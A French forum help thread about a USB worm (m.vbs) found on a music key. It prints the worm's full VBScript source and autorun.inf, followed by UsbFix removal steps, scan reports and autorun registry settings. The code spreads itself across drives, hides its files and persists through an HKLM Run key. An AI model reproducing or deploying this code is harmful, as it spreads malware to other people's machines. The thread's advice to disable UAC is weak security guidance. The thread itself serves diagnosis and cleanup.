Virus m.vbs trouvé maintenant sur clé usb [Fermé]

Signaler
-
flo-91
Messages postés
5649
Date d'inscription
mardi 19 mai 2009
Statut
Contributeur sécurité
Dernière intervention
31 octobre 2019
-
Bonjour,


Virus trouvé par avast! ... (désactivé 10 minutes pour pouvoir ouvrir le fichier).

Quels sont les problèmes (pas assez de connaissances pour décrypté le code)?


Clé USB sur "F:"
Nom = "NOLIMIT"


autorun.inf:
[autorun]
shellexecute=wscript.exe m.vbs



m.vbs:
on error resume next

dim mysrc,wipth,flshdrv,FiSi,MiFi,tra,TiFi,RiGi,NiTi,chk,SiDi

tra = "[autorun]"&vbcrlf&"shellexecute=wscript.exe m.vbs"
set FiSi = createobject("Scripting.FileSystemObject")
set MiFi = FiSi.getfile(Wscript.ScriptFullname)
dim txt,sizi
sizi = MiFi.sizi
chk = MiFi.drive.drivetype
set txt=MiFi.openastextstream(1,-2)
do while not txt.atendofstream
mysrc=mysrc&txt.readline
mysrc=mysrc & vbcrlf
loop
do
Set wipth = FiSi.getspecialfolder(0)
set TiFi = FiSi.getfile(wipth & "\m.vbs")
TiFi.attributes = 32
set TiFi=FiSi.createtextfile(wipth & "\m.vbs",2,true)
TiFi.write mysrc
TiFi.close
set TiFi = FiSi.getfile(wipth & "\m.vbs")
TiFi.attributes = 39
for each flshdrv in FiSi.drives
If (flshdrv.drivetype = 1 or flshdrv.drivetype = 2) and flshdrv.path <> "A:" then
set TiFi=FiSi.getfile(flshdrv.path &"\m.vbs")
TiFi.attributes =32
set TiFi=FiSi.createtextfile(flshdrv.path &"\m.vbs",2,true)
TiFi.write mysrc
TiFi.close
set TiFi=FiSi.getfile(flshdrv.path &"\m.vbs")
TiFi.attributes =39
set TiFi =FiSi.getfile(flshdrv.path &"\autorun.inf")
TiFi.attributes = 32
set TiFi=FiSi.createtextfile(flshdrv.path &"\autorun.inf",2,true)
TiFi.write tra
TiFi.close
set TiFi =FiSi.getfile(flshdrv.path &"\autorun.inf")
TiFi.attributes=39
end if
next
set RiGi = createobject("WScript.Shell")
RiGi.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\m",wipth&"\m.vbs"
if chk <> 1 then
Wscript.sleep 199999
end if
loop while chk<>1


J'ai rien dans "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" pas de *dossier* "m". Avast! Free Antivirus à réagit parce que j'ai voulu ouvrir le fichier m.vbs, après l'a voir vu dans documents récemment ouverts du menu vista, pour voir le contenu. Le simple fait de vouloir voir les propriétés du fichier fait réagir avast!.

La clé contient de la musique (et le virus?) qui viens d'un centre de loisir ...



merci

6 réponses

Messages postés
5649
Date d'inscription
mardi 19 mai 2009
Statut
Contributeur sécurité
Dernière intervention
31 octobre 2019
969
Bonsoir,

En effet, tu as une infection usb, pour la traiter :


/!\ Utilisateur de vista et windows 7 : ne pas oublier de désactiver Le contrôle des comptes utilisateurs
http://www.commentcamarche.net/faq/sujet-8343-vista-desactiver-l-uac

>Usbfix<

>Télécharge USBFIX de Chiquitine29, C_xx ici :

http://pagesperso-orange.fr/NosTools/Chiquitine29/UsbFix.exe

>/!\ Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) susceptible d'avoir été infectées sans les ouvrir

> Double clic sur le raccourci UsbFix présent sur le bureau .

>Choisir l'option 2 Suppression et laisser travailler l'outil

Ensuite poste le rapport UsbFix.txt qui apparaîtra.


* Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque. ( C:\UsbFix.txt )

* Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool.
Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.


* Tuto : http://pagesperso-orange.fr/NosTools/usbfix.html
4
Merci

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 81836 internautes nous ont dit merci ce mois-ci

############################## | UsbFix 7.027 | [Recherche]

(...)

################## | Mountpoints2 |

HKCU\.\.\.\.\Explorer\MountPoints2\{63b48f78-fd14-11de-916e-001c252d61d2}
Shell\AutoRun\Command = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe m.vbs

HKCU\.\.\.\.\Explorer\MountPoints2\{e14d00eb-b43c-11dd-af30-001c252d61d2}
Shell\AutoRun\Command = J:\setup\rsrc\Autorun.exe
Shell\dinstall\Command = J:\Directx\dxsetup.exe


################## | Vaccin |

(!) Cet ordinateur n'est pas vacciné!

################## | E.O.F |



--------------------



Dans:
Panneau de configuration\Programmes par défaut (dans le menu "Démarrer" sur option!)
Puis:
Panneau de configuration\Exécution automatique ("Modifier les paramètres de la lecture automatique")

Tout est à:
"Toujours me demander"

=

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"NoDriveAutoRun"=dword:00000003



--------------------



############################## | UsbFix 7.027 | [Suppression]

Utilisateur: (...) (Administrateur) # (...) [PACKARD BELL BV IMEDIA F9218 AIO]
Mis à jour le 28/09/10 par El Desaparecido / C_XX
Lancé à 23:26:00 | 02/10/2010
Site Web: http://www.teamxscript.org
Contact: FindyKill.Contact@gmail.com

CPU: Intel(R) Pentium(R) D CPU 3.00GHz
Microsoft® Windows Vista(TM) Édition Familiale Premium (6.0.6002 32-Bit) # Service Pack 2
Internet Explorer 8.0.6001.18943

Pare-feu Windows: Activé
RAM -> 2046 Mo
C:\ (%systemdrive%) -> Disque fixe # 185 Go (14 Go libre(s) - 8%) [A2C-VISTA] # NTFS
D:\ -> Disque fixe # 40 Go (19 Go libre(s) - 48%) [A3D-DONNEES] # NTFS
F:\ -> Disque amovible # 4 Go (2 Go libre(s) - 66%) [NOLIMIT] # FAT32
I:\ -> CD-ROM

################## | Éléments infectieux |



################## | Registre |


################## | Mountpoints2 |

Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{63b48f78-fd14-11de-916e-001c252d61d2}
Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{e14d00eb-b43c-11dd-af30-001c252d61d2}

################## | Listing |

(...) 1ou 2 fichiers persos identifiants dans c:\ ... notamment (duplicate save) & rien de bizarre.

################## | Vaccin |

C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
D:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
F:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

################## | E.O.F |



--------------------



Dans:
Panneau de configuration\Programmes par défaut (dans le menu "Démarrer" sur option!)
Puis:
Panneau de configuration\Exécution automatique ("Modifier les paramètres de la lecture automatique")

Tout est à:
"Toujours me demander"

=

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"NoDriveAutoRun"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"BindDirectlyToPropertySetStorage"=dword:00000000
"NoDriveAutoRun"=dword:00000003


Ok ...


Note: Pour passer l'UAC sur Vista, démarrez UsbFix.exe par clic droit puis item "Exécuter en tant qu'administrateur" ; puis à CHAQUE BLOCAGE ou Freezage de Windows Vista et donc de UsbFix.exe, faites touches Ctrl + Alt + Suppr, puis touche "Echap" ! UsbFix.exe fonctionne ...


Comment faire pour désactiver la fonctionnalité exécution automatique dans Windows :
http://support.microsoft.com/kb/967715/fr

The benefit of using NoDriveTypeAutoRun, rather than NoDriveAutoRun, is that you can fine-tune which drives you wish to disable. For example, you can disable all network and all unknown drives from running AutoPlay, but allow CD-ROM drives to run AutoPlay, and thus start automatically. PAGE SOURCE CITATION.

Pas vraiment ok ... ! o_O ? Les deux valeurs (4 en fait = 2 dans/par user(s) et 2 dans machine) doivent être correcte ou une domine l'autre ? Et quid de la clé "HonorAutorunSetting" de type REG_DWORD ; plage = 0x0-0xFF ; par défaut = "0 x 01" (absente) ?


1 port usb libre ... donc 1 seule clé usb. Est-ce que le fichier virus ou surtout le lanceur "autorun.inf" peuvent se cacher sur les disques durs formatés en ntfs par les ACL (permissions) NTFS ou par Alternate Data Stream en NTFS ? J'aurais un disque dur externe "WE" (à brancher sur la tv et m*rdique au plus possible car l'usb ne fonctionne pas bien sur Vista et avec ce pc = connexion usb instable) à vérifier, d'où la question ; (mais c'est en Fat32 je crois).
Messages postés
5649
Date d'inscription
mardi 19 mai 2009
Statut
Contributeur sécurité
Dernière intervention
31 octobre 2019
969
Tu n'a pas de ports usb à l'arrière du pc ?
Bonjour,

(CCLEANER = startup.txt = 1 ligne ici)

Oui HKLM:RunOnce InnoSetupRegFile.0000000001 "C:\Windows\is-AFARJ.exe" /REG

Est-ce que cette ligne ci-dessus est normal ; merci ?

J'ai trouvé cela :

Inno Setup Unpacker | Download Inno Setup Unpacker software for free at SourceForge.net :
http://sourceforge.net/projects/innounp/

merci
* List of files to be registered on the next reboot. DO NOT EDIT! *  

[s.]C:\Program Files\JPEG Lossless Rotator\contmenu.dll


JPEG Lossless Rotator. Free JPG photo rotation software :
http://annystudio.com/software/jpeglosslessrotator/

J'ai trouvé l'origine ... dans le fichier C:\Windows\is-AFARJ.lst ;-)

J'ai lancé 2 RunOnce déjà = J'ai viré NOS (L'ADOBE, lire "la daube", installateur) et je sais plus quoi (sans importance donc). J'ai ouvert une "cmd" en mode admin et j'ai copié la ligne.

J'exécute la ligne ... qui aurait dû être déjà faite ? Ou je la supprime simplement ? Je la supprime car ""C:\Windows\is-AFARJ.exe" /REG" ne donne rien ... = kamikaze.


Ah si en fait, ça supprime l'installateur inno setup dans "C:\Windows" ; sur Vista, "is-" dans le champs de recherche ne donne plus rien et rien en regardant.
Y'a un bug avec le run once si il se lance pas ...
Non, enfin pas libre. clavier/souris (récepteur sans fil), webcam et imprimante.
Messages postés
5649
Date d'inscription
mardi 19 mai 2009
Statut
Contributeur sécurité
Dernière intervention
31 octobre 2019
969
Tu me fais quoi là ?

Fait ceci :


On va commencer par analyser ton pc, :

Télécharges Zhpdiag ici : http://telechargement.zebulon.fr/zhpdiag.html

Une fois le téléchargement achevé, dézippes le fichier obtenu et place ZHPDiag.exe sur ton Bureau.

Double-clique sur l'icône pour lancer le programme.

Clique sur Tous pour cocher toutes les cases des options.

Clique sur la loupe pour lancer l'analyse.

A la fin de l'analyse, clique sur l'appareil photo et enregistre le rapport sur ton Bureau.

Ouvre le fichier sauvegardé (ZHPDiag.txt)avec le Bloc-Notes et copie son contenu dans ta réponse.

Rends toi sur http://www.cijoint.fr clic sur Parcourir, choisis le rapport sur ton bureau et clic sur Créer le lien,
Un lien te sera généré, postes le dans ta prochaine réponse .